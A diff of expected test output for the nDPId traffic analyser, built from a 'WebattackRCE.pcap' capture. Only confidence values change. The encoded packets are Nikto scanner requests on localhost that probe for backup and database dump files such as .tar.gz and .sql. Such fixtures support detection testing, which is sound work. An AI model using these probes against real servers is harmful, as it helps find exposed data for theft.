00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 